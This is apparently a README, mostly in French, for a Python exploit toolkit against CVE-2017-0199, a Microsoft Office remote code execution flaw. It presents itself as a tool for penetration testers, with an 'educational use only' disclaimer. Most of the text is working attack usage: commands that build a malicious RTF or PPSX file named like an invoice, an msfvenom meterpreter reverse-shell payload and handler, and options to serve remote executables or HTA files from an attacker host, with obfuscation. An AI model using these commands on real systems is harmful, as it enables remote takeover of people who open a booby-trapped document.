
Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
Exploit toolkit CVE-2017-0199 - v4.0 est un script Python pratique qui fournit aux testeurs d'intrusion et aux chercheurs en sécurité un moyen rapide et efficace de tester la RCE Microsoft Office. Il peut générer un fichier RTF/PPSX malveillant et délivrer metasploit / meterpreter / d'autres charges utiles à la victime sans aucune configuration complexe.
Ce programme est destiné UNIQUEMENT à des fins éducatives. Ne l'utilisez pas sans autorisation. La clause de non-responsabilité habituelle s'applique, en particulier le fait que moi (bhdresh) ne suis pas responsable des dommages causés par l'utilisation directe ou indirecte des informations ou fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet n'assume AUCUNE responsabilité quant au contenu ou à l'utilisation abusive de ces programmes ou de tout dérivé de ceux-ci. En utilisant ce programme, vous acceptez le fait que tout dommage (perte de données, crash système, compromission système, etc.) causé par l'utilisation de ces programmes n'est pas de la responsabilité de bhdresh.
Enfin, ceci est un développement personnel, veuillez respecter sa philosophie et ne l'utilisez pas pour de mauvaises choses !
Licence CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
Les fonctionnalités suivantes ont été introduites dans le script
- Générer un fichier PPSX malveillant
- Mode d'exploitation pour le fichier PPSX généré
- template.ppsx mis à jour
Version : Python version 2.7.13
1) Générer un fichier RTF malveillant
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Facultatif, si vous utilisez une charge utile MSF) : Générer la charge utile metasploit et démarrer le gestionnaire
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Démarrer la boîte à outils en mode exploitation pour délivrer une charge utile locale
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

1) Générer un fichier RTF malveillant
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Démarrer la boîte à outils en mode exploitation pour délivrer une charge utile distante
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe

1) Générer un fichier RTF malveillant
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Démarrer la boîte à outils en mode exploitation pour délivrer un fichier HTA personnalisé
# python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta

# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft office RCE)
Modes :
-M gen Générer uniquement un fichier malveillant
Générer un fichier RTF/PPSX malveillant :
-w <Filename.rtf/Filename.ppsx> Nom du fichier RTF/PPSX malveillant (Partagez ce fichier avec la victime).
-u <http://attacker.com/test.hta> Le chemin vers un fichier HTA/SCT. Normalement, cela devrait être un domaine ou une IP où cet
outil est en cours d'exécution.
Par exemple, http://attackerip.com/test.doc (Cette URL sera incluse dans le
fichier RTF/PPSX malveillant et sera demandée une fois que la victime ouvrira le fichier RTF malveillant.
-t RTF|PPSX (par défaut = RTF) Type de fichier à générer.
-x 0|1 (par défaut = 0) Générer un fichier RTF obscurci. 0 = Désactiver, 1 = Activer.
-M exp Démarrer le mode exploitation
Exploitation :
-t RTF|PPSX (par défaut = RTF) Type de fichier à exploiter.
-H </tmp/custom> Chemin local d'un fichier HTA/SCT personnalisé qui doit être délivré et exécuté sur la cible.
NOTE : Cette option ne délivrera pas les charges utiles spécifiées via les options "-e" et "-l"
-p <TCP port:Default 80> Numéro de port local.
-e <http://attacker.com/shell.exe> Le chemin d'un fichier exécutable / shell meterpreter / charge utile qui doit être exécuté sur la cible.
-l </tmp/shell.exe> Si la charge utile est hébergée localement, spécifiez le chemin local d'un fichier exécutable / shell meterpreter / charge utile.
@nixawk pour l'échantillon RTF, @Li Haifei, @bhdresh
Évidemment, je ne suis pas développeur à plein temps, attendez-vous donc à quelques accrocs
Veuillez signaler les bugs et problèmes via https://github.com/bhdresh/CVE-2017-0199/issues/new